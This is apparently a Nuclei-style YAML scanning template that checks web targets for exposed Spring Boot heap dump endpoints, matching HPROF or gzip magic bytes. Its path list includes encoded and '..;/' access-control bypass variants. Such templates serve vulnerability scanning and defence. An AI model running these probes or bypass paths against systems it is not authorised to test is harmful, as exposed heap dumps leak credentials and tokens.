id: springboot-heapdump-63
info:
  author: booboo
  name: Spring Boot  Heap Dump
  severity: critical
  tags: springboot
requests:
- matchers:
  - binary:
    - 4a4156412050524f46494c45
    - 4850524f46
    - 1f8b080000000000
    condition: or
    part: body
    type: binary
  - status:
    - 200
    type: status
  matchers-condition: and
  max-size: 2097152
  method: GET
  path:
  - '{{BaseURL}}/heapdump'
  - '{{BaseURL}}/actuator/heapdump'
  - '{{BaseURL}}/heapdump'
  - '{{BaseURL}}/admin/heapdump'
  - '{{BaseURL}}/..;/admin/heapdump'
  - '{{BaseURL}}/..;/admin/actuator/heapdump'
  - '{{BaseURL}}//actuator/heapdump'
  - '{{BaseURL}}/%2f/heapdump'
  - '{{BaseURL}}/%2f/actuator/heapdump'
  - '{{BaseURL}}/%2e/heapdump'
  - '{{BaseURL}}/%2e/actuator/heapdump'
  - '{{BaseURL}}/%2e%2e/heapdump'
  - '{{BaseURL}}/%2e%2e/actuator/heapdump'
  - '{{BaseURL}}/..;/%2e/heapdump'
  - '{{BaseURL}}/..;/%2e/actuator/heapdump'
  - '{{BaseURL}}/dump'
  - '{{BaseURL}}/actuator/dump'
  - '{{BaseURL}}/dump'
  - '{{BaseURL}}/admin/dump'
  - '{{BaseURL}}/..;/admin/dump'
  - '{{BaseURL}}/..;/admin/actuator/dump'
  - '{{BaseURL}}//actuator/dump'
  - '{{BaseURL}}/%2f/dump'
  - '{{BaseURL}}/%2f/actuator/dump'
  - '{{BaseURL}}/%2e/dump'
  - '{{BaseURL}}/%2e/actuator/dump'
  - '{{BaseURL}}/%2e%2e/dump'
  - '{{BaseURL}}/%2e%2e/actuator/dump'
  - '{{BaseURL}}/..;/%2e/dump'
  - '{{BaseURL}}/..;/%2e/actuator/dump'
  stop-at-first-match: true
